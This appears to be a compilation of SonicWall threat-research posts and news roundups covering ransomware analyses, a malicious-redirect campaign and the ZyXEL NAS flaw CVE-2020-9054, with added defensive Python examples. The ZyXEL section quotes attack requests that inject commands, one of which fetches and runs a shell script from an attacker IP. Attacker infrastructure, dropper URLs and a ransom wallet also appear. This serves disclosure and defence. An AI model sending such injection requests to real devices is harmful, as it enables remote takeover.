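setTimeout('\x77\x69\x6e\x64\x6f\x77\x2e\x68\x69\x73\x74\x6f\x72\x79\x2e\x66\x6f\x72\x77\x61\x72\x64\x28\x29\x3b', 0x0);
"""

# Constructed ordinary page script for comparison.
BENIGN_JS = r"""
function greet(name) { return 'Hello, ' + name; }
document.getElementById('out').textContent = greet('world');
"""

if __name__ == "__main__":
    for label, source in (("sample", SAMPLE_JS), ("benign", BENIGN_JS)):
        print(label, triage(source))
    print(matches_campaign_path(
        "hxxp://compromised-site.example/uploads/1/3/0/6/130621669/130621669.html"))
```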

 

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 6075 RobotInstall.PD

GAV: 5313 Malagent.N_69

IOCs:

Payload dropper:

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=teamviewer+free++version+9.+0&s1=1m2dj0iak20d
Teamviewer : dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

https://mob1ledev1ces.com/r/?token=29b4b9d3927e49789a254b7c85c089cb4110575c&q=new+toeic+reading+test&s1=191vbjoak560
dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Payload:

dcfc8e6371024654ec74ca98c52919cc797b1387c692be97310271cbcbad6d4b

Attacker IP:

104.27.181.152 – hxxp://ttraff.cc

Hosting server IP (Weebly):

199.34.228.54
199.34.228.59
199.34.228.100
199.34.228.71

Cybersecurity News & Trends – 07-02-20

This week, the U.S. government brought up cybersecurity legislation, while the U.S. judicial system handed down cybercriminal incarceration.


SonicWall Spotlight

Hackers used ransomware to take over parts of UC San Francisco’s network and extorted $1.14 million in exchange for returning access to their files — Daily Mail

  • UC San Francisco hasn’t said what files were affected nor how the ransomware entered the system, but the FBI has opened an investigation into the incident.

SonicWall Lands In Ireland, Expands Channel Partner Strategy — SonicWall Press Release

  • SonicWall today announced that it has appointed Tristan Bateup as country manager for Ireland.

UCSF pays $1 million ransom to recover medical school data from hackers — The Mercury News

  • The UCSF School of Medicine was the third targeted by cyberattacks in the past two months, but a spokesperson said the attack did not affect patient care or ongoing COVID-19 research.

Cybersecurity News

Russian Criminal Group Finds New Target: Americans Working at Home — The New York Times

  • A hacking group calling itself Evil Corp., indicted in December, has shown up in corporate networks with sophisticated ransomware. American officials worry election infrastructure could be next.

How COVID-19 changed Cyber Command’s ‘Cyber Flag’ exercise — Cyberscoop

  • This year, U.S. Cyber Command convened with allied countries for what appeared to be a straightforward simulation of an attack against a European airbase — but then a global pandemic changed all the rules.

Russian cybercriminal gets 9 years for online fraud website — The Washington Times

  • A Russian computer hacker who facilitated $20 million in credit card fraud and ran a sophisticated clearinghouse for international cybercriminals was sentenced Friday to nine years in prison.

Lawmakers introduce legislation to establish national cybersecurity director — The Hill

  • A bipartisan group of lawmakers has introduced legislation in the House that would establish a national cybersecurity director to lead government efforts on cybersecurity.

DDoS botnet coder gets 13 months in prison — ZDNet

  • Kenneth Schuchman, known as Nexus Zeta, created multiple DDoS botnets, including Satori, Okiru, Masuta, and Fbot/Tsunami.

An embattled group of leakers picks up the WikiLeaks mantle — Ars Technica

  • DDoSecrets was banned from Twitter after releasing what they claim is the largest-ever cache of hacked U.S. police data, a leak some say positions the group as the heir apparent of WikiLeaks’ early, idealistic mission.

Senators move to boost state and local cybersecurity as part of annual defense bill — The Hill

  • A group of Senate Democrats on Monday introduced as part of the annual National Defense Authorization Act (NDAA) a measure that would strengthen cybersecurity protections for states vulnerable to malicious cyberattacks.

U.S. FCC issues final orders declaring Huawei, ZTE national security threats — Reuters

  • The FCC has formally designated China’s Huawei Technologies Co and ZTE Corp as posing threats to national security, barring U.S. firms from tapping an $8.3 billion government fund to purchase equipment from the companies.

Schools Already Struggled With Cybersecurity. Then Came Covid-19 — Wired

  • A lack of dedicated funding and resources made it hard to keep data secure — and that was before classes moved almost entirely online.

Things that happen every four years: Olympic Games, presidential elections, and now new Mac ransomware — The Register

  • Known as EvilQuest, the brand-new strain of Mac ransomware was spotted spreading via Russian piracy and torrent sites.

DDoS Attacks Jump 542% from Q4 2019 to Q1 2020 — Dark Reading

  • The shift to remote work and heavy reliance on online services has driven an increase in attacks intended to overwhelm ISPs.

Tax software used by Chinese bank clients installs GoldenSpy backdoor — SC Magazine

  • A tax software program installed by business clients of an unidentified Chinese bank was trojanized with malware that installs a backdoor granting attackers system-level privileges, researchers warn.

In Case You Missed It

BadBoy ransomware, variant of Spartacus charges $1000 for decryption

The SonicWall Capture Labs threat research team has observed reports of ransomware that encrypts files and appends a “.BadBoy” extension to their names. This variant of the malware is new but is based on Spartacus ransomware, which was first seen in early 2018. Like Spartacus, it is written in .NET and uses a ransom page that is similar in appearance. However, in this variant, the code is not obfuscated.


Infection Cycle:


Upon execution, files are encrypted and the following message is displayed on the desktop:


Files encrypted by the malware are given a .BadBoy extension.

The malware drops ReadME-BadboyEncryption.txt on to the desktop.  It contains the following message:


As the malware is written in .NET, it is easy to decompile and analyse.  Initial inspection of the decompiled output paints a clear picture of the malware’s intentions:

BadBoy code layout


The code layout of the BadBoy variant is simple compared to Spartacus’ layout which is obfuscated:

Spartacus obfuscated code layout


Further inspection shows the directories and file extensions that are targeted for encryption:


Files of the following filetypes are sought out and encrypted:

.exe, .der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .sxw, .stw, .3ds, .max, .3dm, .ods, .sxc, .stc, .dif, .slk, .wb2, .odp, .sxd, .std, .sxm, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .mdf, .ldf, .cpp, .pas, .asm, .cmd, .bat, .vbs, .sch, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .mkv, .flv, .wma, .mid, .m3u, .m4u, .svg, .psd, .tiff, .tif, .raw, .gif, .png, .bmp, .jpg, .jpeg, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .ARC, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .dwg, .pdf, .wk1, .wks, .rtf, .csv, .txt, .msg, .pst, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotm, .dot, .docm, .docx, .doc, .ndf, .pdf, .ib, .ibk, .bkp, .dll, pdb, .dat, .File, .ini, .bin, .PC, loli, .sys, .log, .xml, .vir, .prx, .ds, .mui, .amx, .aep, .csproj, .sln, .cs, .ico, .license, .vb, .resx, .vbproj, .settings, .asset, .json, .db, .md, .ios, .app, .xaml, .snk, .appxmanifest, .asax, .html, .index, .config, .cshtml, .js, .map, .ttf, .css, .aspx, .Master, .nff, .save, .vdproj, .info, .nfo, .flp, .suo, .rec, .studioonemacro, mid, .nvram, .vmsd, .vmx, .vmxf, .wav, .bbc, .cat, .daa, .cue, .nrg, .img, .mds, .ashdisc, .bwi, .b5i, .gi, .cdi, .pdi, .p01, .pxi, .ncd, .c2d, .cif, .lcd, .fcd, .vcd, .dmg, .bif, .uif, .isz, .wim, .ima, .package, .langpack, .cfg, .data, .PNF, .inf, .xsd, .cab, .dmp, .theme, .jnt, .msc, .cd, .user, .manifest, .application, .deploy, .c, .h, .filters, .vcxproj, .sqlproj, .cache, .dacpac, .pdb, .pub, .mpp, .ssk, .wtv, .SFX, .chm, .lst, .ion, .Targets, .lng, .ulf, .xsl, .tmp, .lock, .inc.php, .lib, .pm, .frm, .hlp, .it, .inc, .b4a, .bas, .scss, .nsi, .cgi, .var, .ax, .pck, .bik, .qtr, .vfs0, .vfx, .webm, .webcam, .rpkg, .xpi, .rc, .spr, .res, .tga, .video, .mdl, .lmp, .sc, .lua, .md5, .vst, .awk, .nki, .reg, .7z, .ace, .arj, .bz2, .cab, .gz, .jar, .lz, .lzh, .tar, .uue, .xz, .db, .dbs, .dll, .z, .ogg, .apk, .md, .dewar, .rst, .plist, .tmSnippetz


The key used to encrypt files can be found in the decompiled output.  However, this is not sufficient for decryption as the algorithm (RSA) is asymmetric and the private key (held only by the operators) is required to decrypt files:


We contacted the operators via email as instructed in the ransom message and had the following conversation:


$1000 in bitcoin to 1E7iXR1w7DVnzZPd8vYv9QVYHgN3eoZMWY is demanded:


The next day we even received a final warning:


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: BadBoy.RSM (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication using the weblogin.cgi program. This program fails to properly sanitize the username parameter passed to it. If the username parameter contains an OS command, the value is injected into a command run with the privileges of the web server on the ZyXEL device. By sending a specially crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the hits below more often as attackers scan for vulnerable devices. The request sends the command “ls” in the username parameter; a vulnerable device returns without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the HTTP GET request below, which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh”, and then remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"
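The two requests above are what a defender should be looking for in web-server or proxy logs. The following is an added example (not SonicWall's or ZyXEL's code) that pulls the username parameter out of a weblogin.cgi request line, flags shell metacharacters and the download-and-run tokens seen in the second request, and shows the allowlist check that the CGI, per the description above, does not apply. The sample request lines are constructed from the two strings shown in this post plus one benign login; the allowlist pattern is an assumption about what a valid username should look like.

```python
"""
Detect command-injection attempts against the ZyXEL weblogin.cgi username
parameter in request logs, and show the input validation the CGI lacks.
Added example; the sample requests are constructed from the post's own strings.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample request lines: the two from the post plus a benign login.
SAMPLE_REQUESTS = [
    "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1",
    "GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24"
    "%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1",
    "POST /cgi-bin/weblogin.cgi?username=alice&password=hunter2 HTTP/1.1",
]

# Characters a username never needs but a shell uses to chain or quote commands.
SHELL_META = re.compile(r"[;&|`$'\"\n<>]")
# Tokens from the download-execute-delete chain described in the post.
SUSPICIOUS_TOKENS = ("wget", "curl", "sh ", "/tmp", "rm ")
# Assumed allowlist for a legitimate username (not from the vendor).
VALID_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,32}")


def parse_query(query: str) -> dict:
    """Split on '&' only and percent-decode each side, so a literal ';' inside a
    value (as in the second sample) stays part of the value."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def username_from_request(request_line: str):
    """Return the decoded username of a weblogin.cgi request, or None if not applicable."""
    parts = request_line.split()
    if len(parts) < 2 or "weblogin.cgi" not in parts[1]:
        return None
    return parse_query(urlsplit(parts[1]).query).get("username")


def classify_username(username: str) -> dict:
    """Flag a username that carries shell metacharacters or post-exploitation tokens."""
    findings = []
    if SHELL_META.search(username):
        findings.append("shell metacharacters")
    lowered = username.lower()
    findings += [f"token {tok.strip()!r}" for tok in SUSPICIOUS_TOKENS if tok in lowered]
    return {"username": username, "suspicious": bool(findings), "findings": findings}


def is_valid_username(username: str) -> bool:
    """The allowlist check a CGI must apply before the value reaches any shell."""
    return VALID_USERNAME.fullmatch(username) is not None


def scan(request_lines) -> list:
    """Classify every weblogin.cgi request; each result also records whether the
    username would have passed the allowlist."""
    results = []
    for line in request_lines:
        username = username_from_request(line)
        if username is None:
            continue
        result = classify_username(username)
        result["would_pass_allowlist"] = is_valid_username(username)
        results.append(result)
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        print(r)
```

The query is split by hand rather than with `urllib.parse.parse_qs` because older Python versions also treat `;` as a parameter separator, which would silently truncate the second sample's username to `admin` and hide the injection.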

A quick search on Shodan shows a few hundred affected ZyXEL NAS devices exposed online.


Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates are available for NAS products that have reached end-of-support; users of those products are advised not to leave the device directly exposed to the internet. If possible, place it behind a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IPs:

62.171.171.24
108.41.185.191
95.55.151.170
110.29.165.15
83.228.1.77
213.59.131.51
201.21.226.33
222.138.203.0
77.76.182.174
103.123.150.66
182.180.173.249
194.143.248.230
128.90.164.48
103.234.226.145
75.145.190.44
94.227.15.86
108.7.223.135
169.1.233.212
114.129.28.252
89.211.220.169
37.191.233.81
187.143.247.123
116.196.65.202
47.101.136.228
93.114.113.103
154.126.79.223
187.182.168.14
14.234.48.139
92.70.17.98
177.81.219.19
91.227.50.230
122.230.145.99
95.76.102.94
77.52.185.59
67.165.140.191
187.120.194.22
82.222.168.10
94.225.181.234
124.123.127.69
61.239.185.168
190.139.6.182
213.164.215.33
103.240.77.52
124.109.50.214
122.117.143.35
114.220.117.147
109.130.153.176
83.23.126.120
93.40.11.165
213.153.153.219
103.133.122.6
203.40.91.116
186.158.175.131
69.254.107.46
2.26.219.16
177.41.37.241
73.185.241.75
200.117.244.223
220.184.203.94
41.188.62.215
177.39.102.151


Cybersecurity News & Trends – 06-26-20

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.


SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO — Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP — ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught — The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and the CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales devices — ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as they received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption — The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD — ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack — Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline — ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees — Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks — ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we have noticed the malware using the following Key to encrypt your files. (See source code below).

This makes it easier for us to create a decryptor tool for COBRALOCKER.
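The contrast between this post and the BadBoy analysis above is worth making concrete: a key recovered from a COBRALOCKER binary is enough to build a decryptor, while the key visible in BadBoy's decompiled output is an RSA public key and gives an analyst nothing without the operators' private key. The following is an added example (not SonicWall's tooling and not either malware's code) demonstrating both situations. It assumes COBRALOCKER's key is symmetric, as the decryptor remark implies; since the post does not name the algorithm, a SHA-256 keystream cipher stands in for it, and textbook RSA on toy primes stands in for BadBoy's RSA. The key bytes, plaintext and per-file key are constructed values.

```python
"""
Why a hard-coded symmetric key yields a decryptor while an embedded RSA public
key does not. Added example with stand-in ciphers; insecure, for illustration only.
"""
import hashlib
from math import gcd

# Constructed placeholder for the key recovered from the COBRALOCKER binary.
EMBEDDED_SYM_KEY = b"constructed-hardcoded-key"


def _keystream(key: bytes, length: int) -> bytes:
    """Derive a keystream from the key with SHA-256 in counter mode (stand-in cipher)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def sym_encrypt(key: bytes, data: bytes) -> bytes:
    """XOR the data with the keystream; the same call decrypts."""
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def decryptor_from_embedded_key(ciphertext: bytes) -> bytes:
    """A decryptor tool: nothing beyond what the binary leaks is needed."""
    return sym_encrypt(EMBEDDED_SYM_KEY, ciphertext)


def rsa_keygen(p: int, q: int, e: int = 65537):
    """Textbook RSA on small primes. Returns ((n, e), d); only d inverts encryption."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return (n, e), d


def rsa_encrypt(pub, m: int) -> int:
    n, e = pub
    return pow(m, e, n)


def rsa_decrypt(d: int, n: int, c: int) -> int:
    return pow(c, d, n)


def public_only_attempt(pub, c: int) -> int:
    """All an analyst holding only the embedded (n, e) can compute: applying e
    again does not undo the encryption, because that needs d."""
    n, e = pub
    return pow(c, e, n)


def demo():
    """Return (symmetric decryptor works, RSA private key works, RSA public key alone works)."""
    plaintext = b"constructed victim document contents"
    ct = sym_encrypt(EMBEDDED_SYM_KEY, plaintext)
    sym_ok = decryptor_from_embedded_key(ct) == plaintext

    pub, d = rsa_keygen(104729, 1299709)  # toy primes; real keys are 2048-bit or larger
    file_key = 123456789  # stands in for a per-file key the malware wraps with RSA
    c = rsa_encrypt(pub, file_key)
    private_ok = rsa_decrypt(d, pub[0], c) == file_key
    public_only_ok = public_only_attempt(pub, c) == file_key
    return sym_ok, private_ok, public_only_ok


if __name__ == "__main__":
    print(demo())  # (True, True, False)
```

The third value is the BadBoy situation: with real key sizes, recovering `d` from `(n, e)` means factoring `n`, so the embedded key is a dead end for decryption even though it is plainly visible in the decompiled code.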

After encrypting all personal documents, the ransomware displays the following image, which states that the computer has been encrypted and instructs the victim to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)